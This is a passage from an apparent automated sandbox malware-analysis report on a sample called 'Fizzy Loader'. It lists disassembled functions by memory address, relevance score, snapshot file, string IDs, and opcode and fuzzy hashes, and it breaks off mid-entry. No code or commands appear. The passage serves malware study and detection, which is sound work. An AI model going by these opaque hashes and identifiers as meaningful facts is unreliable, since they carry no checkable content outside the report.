                                                                                                                                                            • Opcode Fuzzy Hash: 2f6316aa01543cac5135542e3dc7bf901a21a431bad864fd46ebd88f04aac900
                                                                                                                                                            • Instruction Fuzzy Hash: 6051A030A2CA064FE328EB1CD485A71B3E1FB94354B1456BDD48BC7697DE25F8438B84
                                                                                                                                                            Function 00007FF848F47580 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8[H
                                                                                                                                                            • API String ID: 0-2136615853
                                                                                                                                                            • Opcode ID: 82c99049eb7e6deedf547c374c36281ea4d12d10d511a8207344215b4b892a1c
                                                                                                                                                            • Instruction ID: 5f46ca378f2c86b1de0283a9b6877f526e34b0fd99093e9d5f346c47c72f6c71
                                                                                                                                                            • Opcode Fuzzy Hash: 82c99049eb7e6deedf547c374c36281ea4d12d10d511a8207344215b4b892a1c
                                                                                                                                                            • Instruction Fuzzy Hash: 2851F532D0EACA4FE756AB7858255B57FE1EF62A50F0801FBD048CB1D7DE08590A8366
                                                                                                                                                            Function 00007FF848F4F2FA Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            • Opcode ID: f323d68ef423dbddaa66ad132e1441e0673932a13e70e45e6910379ebbcb3e8d
                                                                                                                                                            • Instruction ID: 35e5946a6d0a266f877d1c1f7ef73b209a8bbcef1233c40b53d3dd7ee78d9ad0
                                                                                                                                                            • Opcode Fuzzy Hash: f323d68ef423dbddaa66ad132e1441e0673932a13e70e45e6910379ebbcb3e8d
                                                                                                                                                            • Instruction Fuzzy Hash: 2651D23191E98A9FE749EB7888295B97BB1EF56344F0801BAC04DE71E3DE2C2902C715
                                                                                                                                                            Function 00007FF848F4C198 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aK_H
                                                                                                                                                            • API String ID: 0-2603984226
                                                                                                                                                            • Opcode ID: 39a0a27acea587948c6e9c591ad9b3586082e61a97644fffb0efc0e96ecad8b8
                                                                                                                                                            • Instruction ID: 430d8eae829212ae4958e060fabeb743a44ea9325104a0a1bff43e1f9837602b
                                                                                                                                                            • Opcode Fuzzy Hash: 39a0a27acea587948c6e9c591ad9b3586082e61a97644fffb0efc0e96ecad8b8
                                                                                                                                                            • Instruction Fuzzy Hash: 5A513C71A08A4A8FDBC8EF1CC488AA573E1FFA9740F1446B6D41DC7296DF34E8468B54
                                                                                                                                                            Function 00007FF848F8B410 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <G_H
                                                                                                                                                            • API String ID: 0-2873658233
                                                                                                                                                            • Opcode ID: bd347d934438d4a1af1c50a60b22647bc2b227b5a2c210251cd5f04320fd26d2
                                                                                                                                                            • Instruction ID: 33970bdc33b05baad3d05fed4155f6e31d016acbbaeec814b81f36832ff23e7e
                                                                                                                                                            • Opcode Fuzzy Hash: bd347d934438d4a1af1c50a60b22647bc2b227b5a2c210251cd5f04320fd26d2
                                                                                                                                                            • Instruction Fuzzy Hash: 6351C531A1CA0A8FE765FB289840976B3E1FFE5794F0405B9D84AC36D5EF24F8458784
                                                                                                                                                            Function 00007FF848F6CEF0 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QI_L
                                                                                                                                                            • API String ID: 0-1878478260
                                                                                                                                                            • Opcode ID: 9be994b34e3e40bfd70e62529faf8c64f434022e8463c5f11eda2fb3756badbc
                                                                                                                                                            • Instruction ID: 15fd2c66b8335a872cd089f9e0e7d93e0f68bba626764da0550842db4eb16456
                                                                                                                                                            • Opcode Fuzzy Hash: 9be994b34e3e40bfd70e62529faf8c64f434022e8463c5f11eda2fb3756badbc
                                                                                                                                                            • Instruction Fuzzy Hash: 4441E26190DBC65FE356AB7C48592A13FE1DF5B250B0A41FBD089CB0E3E9196C078365
                                                                                                                                                            Function 00007FF848F93CB0 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: p{I
                                                                                                                                                            • API String ID: 0-2826010440
                                                                                                                                                            • Opcode ID: 857953b2011e9fad6275d03f0d30eb5ceb651faa082be7fbb3f5a6afe6f98c2e
                                                                                                                                                            • Instruction ID: ca06f79f40864e6b20e4a9739da52de05083a514dfd21f0d62742aca70300680
                                                                                                                                                            • Opcode Fuzzy Hash: 857953b2011e9fad6275d03f0d30eb5ceb651faa082be7fbb3f5a6afe6f98c2e
                                                                                                                                                            • Instruction Fuzzy Hash: 89316B3091DF895ED768AB2884457B7B7E1EB68354F00096ED08FC3692DF68B4018796
                                                                                                                                                            Function 00007FF848F40640 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8[H
                                                                                                                                                            • API String ID: 0-2136615853
                                                                                                                                                            • Opcode ID: 10de72d4e9133ffc379dfb5e42959442a014a11efecb29d7e5a2f3e4bf1e598d
                                                                                                                                                            • Instruction ID: f608eecdaf78bb01f99847219e94b0385a542a605b6ab76f998bfd5df8d3ac82
                                                                                                                                                            • Opcode Fuzzy Hash: 10de72d4e9133ffc379dfb5e42959442a014a11efecb29d7e5a2f3e4bf1e598d
                                                                                                                                                            • Instruction Fuzzy Hash: 6231F431E1E84A9FEB84BB6C84156BA7BE1EF64750F0441BBD00DC71C7EE1CA8058754
                                                                                                                                                            Function 00007FF848F5E6E8 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ]J_^
                                                                                                                                                            • API String ID: 0-3571334429
                                                                                                                                                            • Opcode ID: e6de60ed725c322a8950dcfd4adabec224dc186bb986f8fcae015334a58076e0
                                                                                                                                                            • Instruction ID: 5b8e13be722ac366ea1d0908ad27e98aeafefe4f4be10e9843f9a80da8e72e59
                                                                                                                                                            • Opcode Fuzzy Hash: e6de60ed725c322a8950dcfd4adabec224dc186bb986f8fcae015334a58076e0
                                                                                                                                                            • Instruction Fuzzy Hash: FE216516A1F1A26AE75273BD34551FA6FA0DF961BCF0C46B3D08C8D093CE0C148A826E
                                                                                                                                                            Function 00007FF848F47569 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8[H
                                                                                                                                                            • API String ID: 0-2136615853
                                                                                                                                                            • Opcode ID: 3c7fa4e58140302f5bee117277493a50cee5f15717c6c7d4cb98de8b5aa1ff93
                                                                                                                                                            • Instruction ID: 06e34dabfc2f367c545ce41ba0111a29dc6cbb1b29d19715c234c0a51c7dc038
                                                                                                                                                            • Opcode Fuzzy Hash: 3c7fa4e58140302f5bee117277493a50cee5f15717c6c7d4cb98de8b5aa1ff93
                                                                                                                                                            • Instruction Fuzzy Hash: E831C132E1E98A4FEB85BB6C88592B97BE1EF64750F0841BBD00DC71D7EE1C98068751
                                                                                                                                                            Function 00007FF848F4164A Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +
                                                                                                                                                            • API String ID: 0-3952988497
                                                                                                                                                            • Opcode ID: 8d4c998de85073e6a30ab2f01aa3fa95737708564e7a86152114320980bee009
                                                                                                                                                            • Instruction ID: ea499f963fe849c1dcb90a199c482bac0c0655282bd9346f436b7eed79071384
                                                                                                                                                            • Opcode Fuzzy Hash: 8d4c998de85073e6a30ab2f01aa3fa95737708564e7a86152114320980bee009
                                                                                                                                                            • Instruction Fuzzy Hash: 8021D032A1CD6A4FE294BB7C541A67577C2EB99A54F0401FBE40DD32D3EE289C428385
                                                                                                                                                            Function 00007FF848F4FAA7 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: TK_^
                                                                                                                                                            • API String ID: 0-2151583479
                                                                                                                                                            • Opcode ID: de4226ac1314d4220419fb3050d54f1040555e0c142a2d63ecec114ae11f3cb2
                                                                                                                                                            • Instruction ID: 13a0c3eeefb662b0e2e494e5e19136ae7456416a78d48541e7d92588863f5081
                                                                                                                                                            • Opcode Fuzzy Hash: de4226ac1314d4220419fb3050d54f1040555e0c142a2d63ecec114ae11f3cb2
                                                                                                                                                            • Instruction Fuzzy Hash: 65D05E3186CB098BC344EB14E4408DAB7A0FF94770F840B3EF0AA921D5DF6492828686
                                                                                                                                                            Function 00007FF848F4953B Relevance: .6, Instructions: 641COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2e02f4fe80b3e779a8cbdbbbb47e55533b59300755a2ce56e29d4c281c9aff7d
                                                                                                                                                            • Instruction ID: f5e89ccca7162a8f617fd349c597546878aca65de5ef435e9fc4cff9eb913296
                                                                                                                                                            • Opcode Fuzzy Hash: 2e02f4fe80b3e779a8cbdbbbb47e55533b59300755a2ce56e29d4c281c9aff7d
                                                                                                                                                            • Instruction Fuzzy Hash: C3222761F0EA8B0FE74AF73854182B56BE1EFA6A90F1844FBC049DB1E7DE2D59058305
                                                                                                                                                            Function 00007FF848F4909F Relevance: .6, Instructions: 641COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 532c29cafb30aba23852921bdc1d9cfef439598fd0c7bf750e3fd376129fcfe8
                                                                                                                                                            • Instruction ID: f4d3282ae2ffbb2cbce3bd8b5cd82f6e8e80034fa744eb69096f37b9ef001a41
                                                                                                                                                            • Opcode Fuzzy Hash: 532c29cafb30aba23852921bdc1d9cfef439598fd0c7bf750e3fd376129fcfe8
                                                                                                                                                            • Instruction Fuzzy Hash: CB220771F0E98B0FE74AE73844182B57BA2EFA6690F0844FBD049DB1E7DE2C69058355
                                                                                                                                                            Function 00007FF848F5CD30 Relevance: .5, Instructions: 507COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 740f340f056c548927e96260fb4be9ea08fa9bb748a48f50c6622d5c6be6a07c
                                                                                                                                                            • Instruction ID: 535db892727847960ebda11b4f166623d3b7f08d0ad0214acb193946ee60dd92
                                                                                                                                                            • Opcode Fuzzy Hash: 740f340f056c548927e96260fb4be9ea08fa9bb748a48f50c6622d5c6be6a07c
                                                                                                                                                            • Instruction Fuzzy Hash: 4DE10430B0DA0A4FE758AB6CA845A7577D1EF99360F1402BED40DC72D6DF39E8428389
                                                                                                                                                            Function 00007FF848F84DF0 Relevance: .5, Instructions: 490COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f8d578f8f737bd7d1200b63a175c3940ea47a537b066dc73a1c153165c6d27a9
                                                                                                                                                            • Instruction ID: d30623754e1c610b5d0fd05e193197089b43b2cca0ca19908c527022d459af27
                                                                                                                                                            • Opcode Fuzzy Hash: f8d578f8f737bd7d1200b63a175c3940ea47a537b066dc73a1c153165c6d27a9
                                                                                                                                                            • Instruction Fuzzy Hash: D2E1D130A1DA894FE758AB2C9849BB57BD1EF69340F1401BEE44EC72D7DF28AC468345
                                                                                                                                                            Function 00007FF848F48DA9 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 03140036638164e145709b4312559c94f2480a930b317f7e5896ffd9374aa78a
                                                                                                                                                            • Instruction ID: 30e0bd5857a666a5ca0e00cb36412d5aad810c233edb86e7c3f0691602b72b69
                                                                                                                                                            • Opcode Fuzzy Hash: 03140036638164e145709b4312559c94f2480a930b317f7e5896ffd9374aa78a
                                                                                                                                                            • Instruction Fuzzy Hash: 35E1F260E0E98E1FE789FB2894193BD36D2EF95B90F1405BAD01DD72D7DE2DA8018345
                                                                                                                                                            Function 00007FF848F59AB0 Relevance: .5, Instructions: 470COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e4c081c7c31d9c6572f84ea015bb262f7de44d7a807abee1363264f543afd1ba
                                                                                                                                                            • Instruction ID: 186a18dedbcc147e11ff88c857af462b6cc3edfcf9ca30b5733944ccbc2b9b12
                                                                                                                                                            • Opcode Fuzzy Hash: e4c081c7c31d9c6572f84ea015bb262f7de44d7a807abee1363264f543afd1ba
                                                                                                                                                            • Instruction Fuzzy Hash: B1D1AF30A1CE0A9FD799EB288495A76B3E1FFA8350F50057DD44EC36D6DF28E8468784
                                                                                                                                                            Function 00007FF848F5D8A8 Relevance: .5, Instructions: 470COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1987e338d3afe0fdb486b0b534b1456b7d5b4c490999405eeb0ec3ca2189e28f
                                                                                                                                                            • Instruction ID: 5e9f522eb49cc740def0a7551bdacbbae5e626a27d3f523e5ef36e7f463be8e4
                                                                                                                                                            • Opcode Fuzzy Hash: 1987e338d3afe0fdb486b0b534b1456b7d5b4c490999405eeb0ec3ca2189e28f
                                                                                                                                                            • Instruction Fuzzy Hash: 3ED1B031A1C90A8FE798EB2C9449AB077D1FF69790F1542B9D009C71E6DF28FC868785
                                                                                                                                                            Function 00007FF848F8B420 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fd03ffc3501f3ce415b50d8b5fe526413c2469cc7e96e85f50032667f99df9d1
                                                                                                                                                            • Instruction ID: b935756b918cdedc525ae257db7263282ef25b6d9b520bf13b4ab88118fa7d5a
                                                                                                                                                            • Opcode Fuzzy Hash: fd03ffc3501f3ce415b50d8b5fe526413c2469cc7e96e85f50032667f99df9d1
                                                                                                                                                            • Instruction Fuzzy Hash: D5E15B30A0C90A8FDB98FB18D094A6573E2FBD9354F1445B9C44ECB6D6DB29EC86C744
                                                                                                                                                            Function 00007FF848F49600 Relevance: .5, Instructions: 454COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 166ccb65844899c0cecb41c4413eeae7baf3efac8b9c03f00f85e93e7f004e39
                                                                                                                                                            • Instruction ID: c838fed6ba4f6d4c906af8eaaf6fe9e8c6ddeed32e83e4928eb0b524ca8bf927
                                                                                                                                                            • Opcode Fuzzy Hash: 166ccb65844899c0cecb41c4413eeae7baf3efac8b9c03f00f85e93e7f004e39
                                                                                                                                                            • Instruction Fuzzy Hash: 21E10B61F1ED8B5FF74AE72C54142752AE2EFA5B80F5840BAC00DD71EBEE2C99418314
                                                                                                                                                            Function 00007FF848F586D6 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bfe190d93b7e62df8ce627e48e1200350deec800073631534b1b85effb9aa3c8
                                                                                                                                                            • Instruction ID: bd5c0ea69b28d329ba5003bebd1bccdd859eb9c21ec79627619b25d4846fe62c
                                                                                                                                                            • Opcode Fuzzy Hash: bfe190d93b7e62df8ce627e48e1200350deec800073631534b1b85effb9aa3c8
                                                                                                                                                            • Instruction Fuzzy Hash: 86E13070A19A4E8FDB88EF18C494AAA77E2FF58350F504969D41EC72D6CB34EC52CB40
                                                                                                                                                            Function 00007FF848F515B8 Relevance: .4, Instructions: 418COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e85d5e24b2f7edfdee1aa31ef82a26078596a934c0e75f78d57ec169d60ea60b
                                                                                                                                                            • Instruction ID: 2f8b4f28acf9e52fd40d793bb83a3346d5a10d98ee1a215eef501480fdec3285
                                                                                                                                                            • Opcode Fuzzy Hash: e85d5e24b2f7edfdee1aa31ef82a26078596a934c0e75f78d57ec169d60ea60b
                                                                                                                                                            • Instruction Fuzzy Hash: 7EC16830A1D2464FF7A8BB288415279B7C2EF867E0F14447ED49FC72D7DE2C6846820A
                                                                                                                                                            Function 00007FF848F5DC20 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 64374a4ff6945d7e0f5b574a8218d7462f3fb0cf843e41d1a5050805371c3fc2
                                                                                                                                                            • Instruction ID: c07d66e455800b67504ece7ffc89f8e7e6fc093375bdcaa63c09b0335d08d5f8
                                                                                                                                                            • Opcode Fuzzy Hash: 64374a4ff6945d7e0f5b574a8218d7462f3fb0cf843e41d1a5050805371c3fc2
                                                                                                                                                            • Instruction Fuzzy Hash: 18A15031F0CA0B0FEBA9BB2854557B92382EF957C5F544479D40DD72C6DF29AC83828A
                                                                                                                                                            Function 00007FF848F5C689 Relevance: .3, Instructions: 348COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ccd3ec5aee9ec3e8509141458e72f051ff2081c8d843800f0c137c8630adcf9e
                                                                                                                                                            • Instruction ID: 4c01634837995195b48c46a697efa451d4ca501261c7bc6dedcb17580ccbb3c0
                                                                                                                                                            • Opcode Fuzzy Hash: ccd3ec5aee9ec3e8509141458e72f051ff2081c8d843800f0c137c8630adcf9e
                                                                                                                                                            • Instruction Fuzzy Hash: A0B1047180E6CA4FE756E73858155E5BFE0EF86390F0901FBD489CB0E3EA2C590A8356
                                                                                                                                                            Function 00007FF848F5D459 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9004dfb0cc28103c271d5bf1cb9e98f345ad5b571d31daadf11ae1f6ec3de5e8
                                                                                                                                                            • Instruction ID: 04b4a6b224c74af7f571ebc54d3b84d299a15b4585e3f7a26627743edda3d529
                                                                                                                                                            • Opcode Fuzzy Hash: 9004dfb0cc28103c271d5bf1cb9e98f345ad5b571d31daadf11ae1f6ec3de5e8
                                                                                                                                                            • Instruction Fuzzy Hash: 30B1053180E6CA5FE756F77888156E5BFE0EF46390F0901FAD44CCB0D3EA29590A8756
                                                                                                                                                            Function 00007FF848F6BD60 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
